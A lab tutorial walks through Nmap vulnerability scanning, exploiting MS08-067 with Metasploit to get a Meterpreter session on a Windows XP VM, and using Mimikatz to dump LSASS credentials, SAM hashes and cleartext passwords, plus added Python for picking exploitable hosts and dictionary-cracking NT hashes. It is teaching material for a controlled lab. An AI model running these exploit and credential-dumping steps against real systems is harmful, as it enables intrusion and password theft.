Lab+ +Password+Cracking+Using+Mimikatz

This document provides an overview of using Mimikatz to extract passwords from a Windows system. It describes using Nmap to identify a vulnerable Windows XP system on the local network. A Meterpreter session is established using the ms08_067_netapi exploit. Mimikatz is then used to dump password hashes from LSASS memory and from the SAM, and to recover cleartext passwords that the authentication packages hold in memory (the hashes themselves are not decrypted). The document demonstrates how Mimikatz can be used as an attack tool to steal passwords from Windows systems.

Uploaded by

Mohcine Oubadi

Lab – Password Cracking Using Mimikatz

Overview

In this lab, the student will learn how to recover cleartext passwords from a Windows client
using Mimikatz. Mimikatz has become an extremely effective attack tool against Windows
clients, allowing bad actors to retrieve cleartext passwords, as well as password hashes, from
memory. This lab will provide an overview of Mimikatz's capabilities and of how it is delivered
to the victim through a Meterpreter session.

Hardware requirements

• Virtual install of Kali up and running (attacker)
• Virtual install of Windows XP Pro SP2 (victim)
• Both machines up and running, with network connectivity between them.

To begin this lab, we will need an active Meterpreter session between Kali and the victim.

Begin the lab!

Open a terminal in Kali. At the prompt launch the Metasploit console.

Using the Nmap Scripting Engine, you can run the vuln script category to check the 1,000 most
common TCP ports (Nmap's default port set, not the first 1,000 port numbers) for known
vulnerabilities. Nmap can be run from a second terminal or directly at the msf prompt, since
msfconsole passes commands it does not recognise to the system shell.

Type the following command at the terminal prompt:

nmap -Pn --script vuln <IP address or range>

My victim's network range is 192.168.145.0/24; yours may differ. I got the range by running
ifconfig from my Kali terminal: the first three octets of the address assigned to my Kali
machine are the network portion. Setting the last (fourth) octet to zero and appending the CIDR
suffix /24 tells Nmap to scan all 256 addresses in that network (254 usable host addresses plus
the network and broadcast addresses).

I'm treating this as if I am looking for a victim. From my scan results, I see that there is a
machine that the smb-vuln-ms08-067 script reports as VULNERABLE to MS08-067, the bug that
Metasploit's ms08_067_netapi module exploits.

I've gotten enough information from the results, but I can still drill into this machine and
identify specifically what the machine's operating system and service pack are.

Type the following command:

nmap --script smb-os-discovery.nse -p445 192.168.145.129

From my first scan, I learned that the machine at 192.168.145.129 was vulnerable to an SMB
exploit on port 445. I then scanned for operating system information using another Nmap script,
smb-os-discovery, which talks to the SMB service on port 445 and reports the OS version, the
computer name and the workgroup or domain.
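The two scanning steps above produce a lot of text when run against a whole /24, and the only lines that matter for the next step are the State line under smb-vuln-ms08-067 and the OS line under smb-os-discovery. The following is an added example, not part of the lab and not Nmap's or Metasploit's own code: it derives the /24 scan range from the attacker's address the way the text describes, then walks Nmap's normal output and picks out the hosts that are actually worth handing to the exploit. The sample output embedded in it is constructed and abbreviated (the hosts, OS strings and timings are made up, though the script output layout follows the real smb-os-discovery and smb-vuln-ms08-067 format), and the helper names network_for, parse_nmap_output and ms08_067_targets are mine.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed, abbreviated sample of Nmap normal output for two hosts. Not captured
# from a real scan; only the layout of the script blocks follows Nmap's format.
SAMPLE_NMAP_OUTPUT = """
Nmap scan report for 192.168.145.129
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: victim-xp
|_  Workgroup: WORKGROUP
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_    References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

Nmap scan report for 192.168.145.130
Host is up (0.00031s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: ws07
|_  Workgroup: WORKGROUP
|_smb-vuln-ms08-067: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 256 IP addresses (2 hosts up) scanned in 45.12 seconds
"""


@dataclass
class HostResult:
    ip: str
    open_ports: List[int] = field(default_factory=list)
    os: Optional[str] = None
    ms08_067_state: Optional[str] = None  # "VULNERABLE" when the script says so, else None


HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
SCRIPT_RE = re.compile(r"^\|[ _]([\w-]+):")  # "| name:" or "|_name:" opens a script's block


def network_for(address: str, prefixlen: int = 24) -> str:
    """CIDR block to hand to Nmap, derived from the attacker's own address (what
    ifconfig shows on Kali). A /24 covers 256 addresses, .0 through .255."""
    return str(ipaddress.ip_interface(f"{address}/{prefixlen}").network)


def parse_nmap_output(text: str) -> Dict[str, HostResult]:
    """Collect, per host, the open TCP ports, the OS string from smb-os-discovery
    and the State line from smb-vuln-ms08-067 out of Nmap's normal output."""
    hosts: Dict[str, HostResult] = {}
    host: Optional[HostResult] = None
    script: Optional[str] = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = HostResult(ip=m.group(1))
            hosts[host.ip] = host
            script = None
            continue
        if host is None:
            continue
        m = PORT_RE.match(line)
        if m:
            host.open_ports.append(int(m.group(1)))
            continue
        if not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            body = line[m.end():].strip()
        else:
            body = line[2:].strip()  # drop the "| " / "|_" margin and the indentation
        if script == "smb-os-discovery" and body.startswith("OS:"):
            host.os = body[len("OS:"):].strip()
        elif script == "smb-vuln-ms08-067" and body.startswith("State:"):
            host.ms08_067_state = body[len("State:"):].strip()
    return hosts


def ms08_067_targets(hosts: Dict[str, HostResult]) -> List[str]:
    """Hosts worth handing to ms08_067_netapi: 445/tcp open and an explicit
    State: VULNERABLE. A script error or no script output is not a hit."""
    return sorted(ip for ip, h in hosts.items()
                  if 445 in h.open_ports and h.ms08_067_state == "VULNERABLE")


if __name__ == "__main__":
    print("scan range:", network_for("192.168.145.128"))
    results = parse_nmap_output(SAMPLE_NMAP_OUTPUT)
    for ip, h in results.items():
        print(f"{ip}: ports={h.open_ports} os={h.os!r} ms08-067={h.ms08_067_state}")
    print("targets:", ms08_067_targets(results))
```

Feed it a real scan with `nmap -Pn --script vuln,smb-os-discovery -oN scan.txt 192.168.145.0/24` and `parse_nmap_output(open("scan.txt").read())`. The Windows 7 host in the sample shows why the State line is required: the script printed an error for it, not a result, and an error must not be read as "vulnerable".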

The first thing we need to do is get a Meterpreter session going. We have identified that our
victim has an SMB vulnerability on port 445, and Nmap has told us the vulnerability is MS08-067,
which Metasploit exploits with the ms08_067_netapi module. We now must search Metasploit for
that exploit.

At the msf prompt type: search ms08_067

We see that there is an exploit we can use, with use being the operative word. Highlight just the
name of the exploit (exploit/windows/smb/ms08_067_netapi) in the search results. At the msf
prompt, type the word use followed by a single space, then place your cursor in the terminal
window, right-click and select paste.

Hit enter. Note the change in the prompt.

At the prompt type: options

We need to set the IP address of the RHOST (victim). Newer Metasploit releases name this option
RHOSTS; the options output shows which name your version expects.

At the prompt type: set RHOST <IP address>

For me, this command looks like this: set RHOST 192.168.145.129
(This is my victim's IP address, not yours! Yours will differ.)

We launch the exploit, which delivers the payload, with the exploit command. This module's
default payload is a reverse Meterpreter shell (windows/meterpreter/reverse_tcp), so no payload
has to be set by hand; check in the options output that LHOST holds your Kali machine's address,
since that is where the victim will connect back to.

Success! We have our Meterpreter session.

Using Mimikatz to get the password in clear text

We load the Mimikatz extension into the Meterpreter session. The extension is a DLL that is
reflectively loaded into the victim's memory over the existing session; nothing is written to the
victim's disk. (In current Metasploit releases this extension has been superseded by kiwi, loaded
with load kiwi, whose commands are named differently: creds_all, creds_msv, creds_kerberos,
lsa_dump_sam and so on.)

Type: load mimikatz

We can check the version by typing: mimikatz_command -f version

The help mimikatz command lists the extension's own commands: one per credential provider
(msv, kerberos, wdigest, tspkg, ssp, livessp), each of which reads that provider's credentials
out of LSASS memory, plus mimikatz_command for passing a raw Mimikatz command through. We'll
retrieve the passwords for two sets of credentials later in the lab.

We can get a complete list of the available Mimikatz modules by trying to load a non-existent
one; Mimikatz answers the unknown name with the list of modules it does know.

Type: mimikatz_command -f fu::

Reading Hashes and Passwords from Memory

Windows does not store passwords; it stores one-way hashes of them (for local accounts, the LM
and NT hashes in the SAM). A hash cannot be decrypted. What Mimikatz does instead is read the
memory of the LSASS process, where the authentication packages keep credential material for every
user with a logon session: the NT hash (MSV), and, on this version of Windows, a copy of the
cleartext password that providers such as Kerberos and WDigest keep in reversibly encrypted form.
The keys for that encryption sit in LSASS memory as well, so Mimikatz reads both and decrypts the
stored copies; the hashes themselves are never reversed.

We can see both cleartext and hashed passwords with the Mimikatz tool.

With the msv command, we see the LM and NT hashes that the MSV1_0 package holds in memory.

With the kerberos command, we see the cleartext of the administrator password. Remember,
this is being pulled from memory, so only accounts with a current logon session on the machine
appear here.

Another common use for Mimikatz is to dump the hashes from the SAM. The Security Account
Manager (SAM), often called the Security Accounts Manager, is the database in which Windows
stores the LM and NT hashes of local accounts. It is used to authenticate local users and remote
users who log on with a local account; domain accounts are authenticated against Active Directory
instead. Reading it needs SYSTEM privileges, because the stored hashes are encrypted with a key
derived from the boot key held in the SYSTEM hive; the session obtained through ms08_067_netapi
already runs as NT AUTHORITY\SYSTEM, so no privilege escalation is needed here.

Type: mimikatz_command -f samdump::hashes

Hashes from the SAM cannot be decrypted. To turn one into a password you have to crack it offline
(dictionary or brute-force guessing, for example with John the Ripper or Hashcat), or use it as
it is in a pass-the-hash attack. What the next command does is different: it searches LSASS
memory for the cleartext passwords of the users currently logged on.

Type: mimikatz_command -f sekurlsa::searchPasswords
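Both the memory section and the SAM section above rest on the same point: a hash is one-way, so the only route from an NT hash back to a password is guessing. The following is an added example that is not part of this lab and is not Mimikatz's code: it computes NT hashes the way Windows does (MD4 over the UTF-16LE password) with a self-contained MD4, parses a pwdump-style record of the form Meterpreter's hashdump prints, and runs a dictionary attack against it. The sample record and the four-word wordlist are constructed for illustration, and the helper names md4, nt_hash, parse_pwdump_line and crack_nt_hash are mine.

```python
import struct
from typing import Iterable, Optional, Tuple

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), written out so the example runs without an
    OpenSSL legacy provider. Fine for a demo, not a production hash routine."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    # Per round: boolean function, additive constant, message-word order, shift amounts.
    rounds = (
        (F, 0x00000000, [i for i in range(16)], (3, 7, 11, 19)),
        (G, 0x5A827999, [4 * (i % 4) + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [(0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4] for i in range(16)], (3, 9, 11, 15)),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i in range(16):
                a = _rotl((a + fn(b, c, d) + X[order[i]] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the new "a"
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """The NT hash is MD4 over the UTF-16LE encoding of the password. There is no
    salt, so equal passwords always give equal hashes and a precomputed list works."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump_line(line: str) -> Tuple[str, int, str, str]:
    """Split a pwdump-style record, user:rid:lmhash:nthash:::, the format
    Meterpreter's hashdump prints."""
    user, rid, lm, nt = line.split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def crack_nt_hash(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each guess and compare. Guessing is the only way
    back from a hash to a password; there is no key that would decrypt it."""
    target = target_hex.lower()
    for guess in wordlist:
        if nt_hash(guess) == target:
            return guess
    return None


# Constructed sample record (not taken from a real machine). The LM field holds the
# well-known "empty LM hash" value, meaning no LM hash was stored for the account.
SAMPLE_PWDUMP_LINE = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
WORDLIST = ["letmein", "Password1", "password", "123456"]  # constructed, deliberately tiny

if __name__ == "__main__":
    user, rid, lm, nt = parse_pwdump_line(SAMPLE_PWDUMP_LINE)
    print(f"{user} (RID {rid}) NT hash {nt}")
    print("recovered password:", crack_nt_hash(nt, WORDLIST))
```

With a real wordlist the loop is the same, only longer, which is exactly why dedicated crackers exist; and when no guess matches, the function returns None rather than a password, because nothing else can be done with the hash short of passing it as-is.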

End of the lab!
